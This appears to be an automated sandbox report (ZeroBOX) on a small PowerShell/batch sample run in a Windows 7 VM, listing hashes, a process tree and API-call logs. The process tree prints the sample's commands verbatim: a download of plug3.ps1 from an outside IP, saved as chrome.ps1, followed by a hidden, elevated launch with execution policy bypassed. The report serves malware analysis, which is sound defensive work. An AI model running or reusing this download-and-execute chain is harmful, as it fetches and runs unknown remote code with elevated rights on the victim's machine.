Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 14, 2024, 5:45 p.m.	Aug. 14, 2024, 5:49 p.m.

Size	690.0B
Type	UTF-8 Unicode text, with CRLF line terminators
MD5	`88266488dc0941b4ec3aeb8fcce4af6c`
SHA256	`5da6e620feb8de1a649d9640ea86a9e62a9e9b46315e43b1cffe0d02cf751283`
CRC32	`E6C8F655`
ssdeep	`12:LibG1nC1X98pG3wFcUhO959pd998XM4snfWFGqkIIYAHpcAGdwEP1bKYioRidgy5:LibAC1r3wFcUhO95rd/hOIzdGdwEtbKR`
Yara	Antivirus - Contains references to security software

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\uno.ps1
2552
- cmd.exe cmd /c ""C:\Users\Public\Documents\29389023.bat" "
  2684
  - powershell.exe powershell -command "Invoke-WebRequest -Uri 'http://64.94.84.206/plug3.ps1' -OutFile 'C:\Users\Public\Documents\chrome.ps1'"
    2780
  - powershell.exe powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs"
    2872
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1
      2956

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 14, 2024, 5:45 p.m.			0	0
IsDebuggerPresent Aug. 14, 2024, 5:45 p.m.			0	0
IsDebuggerPresent Aug. 14, 2024, 5:45 p.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: + Invoke-WebRequest <<<< -Uri 'http://64.94.84.206/plug3.ps1' -OutFile 'C:\Use console_handle: 0x00000053	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: rs\Public\Documents\chrome.ps1' console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Aug. 14, 2024, 5:45 p.m.	buffer: The argument 'C:\Users\Public\Documents\chrome.ps1 ' to the -File parameter does not exist. Provide the path to an existing '.ps1' file as an argument to the -File parameter. console_handle: 0x0000001f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 103 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003014c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00301ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003020c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00302148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 14, 2024, 5:45 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 291 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02679000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05591000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02743000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02746000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02768000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02769000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
